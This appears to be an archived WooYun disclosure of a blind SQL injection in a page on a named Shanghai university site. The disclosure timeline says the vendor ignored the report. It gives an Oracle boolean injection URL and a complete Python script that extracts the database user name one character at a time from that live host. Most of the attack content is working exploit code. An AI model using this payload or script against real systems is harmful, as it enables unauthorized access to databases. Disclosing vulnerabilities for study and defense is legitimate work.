乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-03: 细节已通知厂商并且等待厂商处理中 2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
http://smulsc.shmtu.edu.cn/rsgl/jbdainfo_qiantai.jsp?zgbh=-1' OR length(SYS_CONTEXT('USERENV','CURRENT_USER'))=4 AND '1'='1
为真时:
为假时:
USER长度为4:
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': '', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)payloads += list(string.ascii_uppercase)for i in range(0,10): payloads.append(str(i))payloads += ['@','_', '.', '-', '\\', ' '] print 'start to retrive Oracle user:'user = ''for i in range(1,5,1): for payload in payloads: s = "ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s" % (i, ord(payload)) s = "-1' or %s and '1'='1" % s conn = httplib.HTTPConnection('smulsc.shmtu.edu.cn', timeout=30) conn.request(method='GET',url="/rsgl/jbdainfo_qiantai.jsp?zgbh=%s" % urllib.quote(s)) html_doc = conn.getresponse().read() #print html_doc conn.close() print '.', if html_doc.find('500') > 0: # true user += payload print '\n[in progress]', user breakprint '\nOracle user is', user
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
漏洞Rank:4 (WooYun评价)
暂无